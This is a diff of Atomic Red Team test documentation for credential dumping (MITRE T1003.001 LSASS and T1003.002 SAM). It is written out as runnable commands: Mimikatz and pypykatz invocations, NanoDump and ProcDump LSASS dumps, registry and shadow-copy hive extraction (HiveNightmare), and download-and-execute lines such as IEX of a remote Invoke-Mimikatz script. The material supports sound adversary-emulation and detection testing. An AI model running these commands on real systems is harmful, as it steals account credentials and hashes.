## Atomic Test #4 - Dump LSASS.exe Memory using NanoDump
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
@@ -182,48 +225,61 @@ Upon successful execution, you should find the nanondump.dmp file in the temp di
**Supported Platforms:** Windows
**auto_generated_guid:** `dddd4aca-bbed-46f0-984d-e4c5971c51ea`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** dddd4aca-bbed-46f0-984d-e4c5971c51ea
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del "%temp%\nanodump.dmp" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
```
### Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager
<br/>
<br/>
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
**auto_generated_guid:** `dea6c349-f1c6-44f3-87a1-1ed33a59a607`
#### Attack Commands: Run it with these steps!
**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
#### Run it with these steps!
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
@@ -236,41 +292,51 @@ Manager and administrative permissions.
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
### Atomic Test #6: Offline Credential Theft With Mimikatz
<br/>
<br/>
## Atomic Test #6 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
**Supported Platforms:** Windows
**auto_generated_guid:** `453acf13-1dbd-47d7-b28a-172ce9228023`
#### Inputs
**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path of the Lsass dump | path | %tmp%&#92;lsass.DMP|
| mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;x64&#92;mimikatz.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{mimikatz_exe}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
@@ -279,23 +345,23 @@ $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_dow
$basePath = Split-Path "#{mimikatz_exe}" | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
```
##### Description: Lsass dump must exist at specified location (#{input_file})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
cmd /c "if not exist #{input_file} (exit /b 1)"
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
```
### Atomic Test #7: LSASS read with pypykatz
<br/>
<br/>
## Atomic Test #7 - LSASS read with pypykatz
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
@@ -306,74 +372,71 @@ Will create a Python virtual environment within the External Payloads folder tha
**Supported Platforms:** Windows
**auto_generated_guid:** `c37bc535-5c62-4195-9cc3-0517673171d8`
#### Inputs
**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_001|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{venv_path}\Scripts\pypykatz" live lsa
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del "%temp%\nanodump.dmp" > nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
```
##### Description: Computer must have venv configured at #{venv_path}
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
py -m venv "#{venv_path}"
```
##### Description: pypykatz must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
```
### Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1
<br/>
<br/>
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.
@@ -382,9 +445,16 @@ Author of Out-Minidump: Matthew Graeber (@mattifestation)
**Supported Platforms:** Windows
**auto_generated_guid:** `6502c8f0-b775-4dbd-9193-1298f56b6781`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -394,13 +464,19 @@ catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
```
### Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump
<br/>
<br/>
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
@@ -410,39 +486,41 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
**Supported Platforms:** Windows
**auto_generated_guid:** `7cede33f-0acd-44ef-9774-15511300b24b`
#### Inputs
**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;procdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
@@ -451,8 +529,13 @@ New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force
```
### Atomic Test #10: Powershell Mimikatz
<br/>
<br/>
## Atomic Test #10 - Powershell Mimikatz
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
@@ -460,62 +543,83 @@ Or, if you try to run the test without the required administrative privileges yo
**Supported Platforms:** Windows
**auto_generated_guid:** `66fb0bc1-3c3f-47e9-a298-550ecfefacbc`
#### Inputs
**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
### Atomic Test #11: Dump LSASS with createdump.exe from .Net v5
<br/>
<br/>
## Atomic Test #11 - Dump LSASS with createdump.exe from .Net v5
Use createdump executable from .NET to create an LSASS dump.
[Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
**Supported Platforms:** Windows
**auto_generated_guid:** `9d0072c8-7cca-45c4-bd14-f852cfa35cf0`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: .Net v5 must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
if ($exePath -and (Test-Path $exePath)) {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
winget install Microsoft.DotNet.DesktopRuntime.5 --accept-source-agreements --accept-package-agreements --silent
```
### Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs
<br/>
<br/>
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
@@ -524,46 +628,53 @@ Upon successful execution, you should see the following file created $env:TEMP\l
**Supported Platforms:** Windows
**auto_generated_guid:** `86fc3f40-237f-4701-b155-81c01c48d697`
#### Inputs
**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xordump_exe | Path to xordump | path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
#{xordump_exe} -out #{output_file} -x 0x41
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item #{output_file} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have xordump.exe
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
```
### Atomic Test #13: Dump LSASS.exe using lolbin rdrleakdiag.exe
<br/>
<br/>
## Atomic Test #13 - Dump LSASS.exe using lolbin rdrleakdiag.exe
The memory of lsass.exe is often dumped for offline credential theft attacks.
This can be achieved with lolbin rdrleakdiag.exe.
@@ -571,9 +682,16 @@ Upon successful execution, you should see the following files created, $env:TEMP
**Supported Platforms:** Windows
**auto_generated_guid:** `47a539d1-61b9-4364-bf49-a68bc2a95ef0`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 47a539d1-61b9-4364-bf49-a68bc2a95ef0
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
@@ -591,13 +709,19 @@ write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /ful
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\t1003.001-13-rdrleakdiag -Recurse -Force -ErrorAction Ignore
```
### Atomic Test #14: Dump LSASS.exe Memory through Silent Process Exit
<br/>
<br/>
## Atomic Test #14 - Dump LSASS.exe Memory through Silent Process Exit
WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a
memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism
introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger
@@ -613,41 +737,47 @@ Upon successful execution, you should find the dump file in directory of your ch
**Supported Platforms:** Windows
**auto_generated_guid:** `eb5adf16-b601-4926-bca7-dad22adffb37`
#### Inputs
**auto_generated_guid:** eb5adf16-b601-4926-bca7-dad22adffb37
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Folder Path where resulting dump should be placed | path | %temp%&#92;SilentProcessExit|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
rmdir "#{output_folder}" /s /q >nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
```
<br/>
atomics/T1003.002/T1003.002.md
+189 -97
View File
@@ -1,44 +1,54 @@
# T1003.002 - OS Credential Dumping: Security Account Manager
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/002)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
> Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
>
> A number of tools can be used to retrieve the SAM file through in-memory techniques:
>
> * pwdumpx.exe
> * [gsecdump](https://attack.mitre.org/software/S0008)
> * [Mimikatz](https://attack.mitre.org/software/S0002)
> * secretsdump.py
>
> Alternatively, the SAM can be extracted from the Registry with Reg:
>
> * <code>reg save HKLM\sam sam</code>
> * <code>reg save HKLM\system system</code>
>
> Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
>
> Notes:
>
> * RID 500 account is the local, built-in administrator.
> * RID 501 is the guest account.
> * User accounts start with a RID of 1,000+.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
[Source](https://attack.mitre.org/techniques/T1003/002)
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* <code>reg save HKLM\sam sam</code>
* <code>reg save HKLM\system system</code>
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</blockquote>
## Atomic Tests
- [Atomic Test #1: Registry dump of SAM, creds, and secrets](#atomic-test-1-registry-dump-of-sam-creds-and-secrets)
- [Atomic Test #2: Registry parse with pypykatz](#atomic-test-2-registry-parse-with-pypykatz)
- [Atomic Test #3: esentutl.exe SAM copy](#atomic-test-3-esentutlexe-sam-copy)
- [Atomic Test #4: PowerDump Hashes and Usernames from Registry](#atomic-test-4-powerdump-hashes-and-usernames-from-registry)
- [Atomic Test #5: dump volume shadow copy hives with certutil](#atomic-test-5-dump-volume-shadow-copy-hives-with-certutil)
- [Atomic Test #6: dump volume shadow copy hives with System.IO.File](#atomic-test-6-dump-volume-shadow-copy-hives-with-systemiofile)
- [Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7-winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
- [Atomic Test #8: Dumping of SAM, creds, and secrets(Reg Export)](#atomic-test-8-dumping-of-sam-creds-and-secretsreg-export)
- [Atomic Test #1 - Registry dump of SAM, creds, and secrets](#atomic-test-1---registry-dump-of-sam-creds-and-secrets)
### Atomic Test #1: Registry dump of SAM, creds, and secrets
- [Atomic Test #2 - Registry parse with pypykatz](#atomic-test-2---registry-parse-with-pypykatz)
- [Atomic Test #3 - esentutl.exe SAM copy](#atomic-test-3---esentutlexe-sam-copy)
- [Atomic Test #4 - PowerDump Hashes and Usernames from Registry](#atomic-test-4---powerdump-hashes-and-usernames-from-registry)
- [Atomic Test #5 - dump volume shadow copy hives with certutil](#atomic-test-5---dump-volume-shadow-copy-hives-with-certutil)
- [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
- [Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7---winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
- [Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)](#atomic-test-8---dumping-of-sam-creds-and-secretsreg-export)
<br/>
## Atomic Test #1 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
@@ -46,9 +56,16 @@ Upon successful execution of this test, you will find three files named, sam, sy
**Supported Platforms:** Windows
**auto_generated_guid:** `5c2571d0-1572-416d-9676-812e64ca9f44`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg save HKLM\sam %temp%\sam
@@ -56,119 +73,142 @@ reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```
### Atomic Test #2: Registry parse with pypykatz
<br/>
<br/>
## Atomic Test #2 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
**Supported Platforms:** Windows
**auto_generated_guid:** `a96872b2-cbf3-46cf-8eb4-27e8c0e85263`
#### Inputs
**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_002|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{venv_path}\Scripts\pypykatz" live lsa
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
```
##### Description: Computer must have venv configured at #{venv_path}
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
py -m venv "#{venv_path}"
```
##### Description: pypykatz must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
```
### Atomic Test #3: esentutl.exe SAM copy
<br/>
<br/>
## Atomic Test #3 - esentutl.exe SAM copy
Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
**Supported Platforms:** Windows
**auto_generated_guid:** `a90c2f4d-6726-444e-99d2-a00cd7c20480`
#### Inputs
**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM|
| file_name | Name of the copied file | string | SAM|
| copy_dest | Destination of the copied file | string | %temp%|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del #{copy_dest}\#{file_name} >nul 2>&1
```
### Atomic Test #4: PowerDump Hashes and Usernames from Registry
<br/>
<br/>
## Atomic Test #4 - PowerDump Hashes and Usernames from Registry
Executes a hashdump by reading the hashes from the registry.
**Supported Platforms:** Windows
**auto_generated_guid:** `804f28fc-68fc-40da-b5a2-e9d0bce5c193`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
@@ -177,66 +217,86 @@ Invoke-PowerDump
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: PowerDump script must exist on disk at specified location
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
```
### Atomic Test #5: dump volume shadow copy hives with certutil
<br/>
<br/>
## Atomic Test #5 - dump volume shadow copy hives with certutil
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** Windows
**auto_generated_guid:** `eeb9751a-d598-42d3-b11c-c122d9c3f6c7`
#### Inputs
**auto_generated_guid:** eeb9751a-d598-42d3-b11c-c122d9c3f6c7
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM|
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
```
### Atomic Test #6: dump volume shadow copy hives with System.IO.File
<br/>
<br/>
## Atomic Test #6 - dump volume shadow copy hives with System.IO.File
Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** Windows
**auto_generated_guid:** `9d77fed7-05f8-476e-a81b-8ff0472c64d0`
#### Inputs
**auto_generated_guid:** 9d77fed7-05f8-476e-a81b-8ff0472c64d0
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM|
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
1..#{limit} | % {
@@ -245,38 +305,65 @@ Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https
}
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
1..#{limit} | % {
rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
```
### Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
<br/>
<br/>
## Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** `0c0f5f06-166a-4f4d-bb4a-719df9a01dbb`
#### Attack Commands: Run with `powershell`!
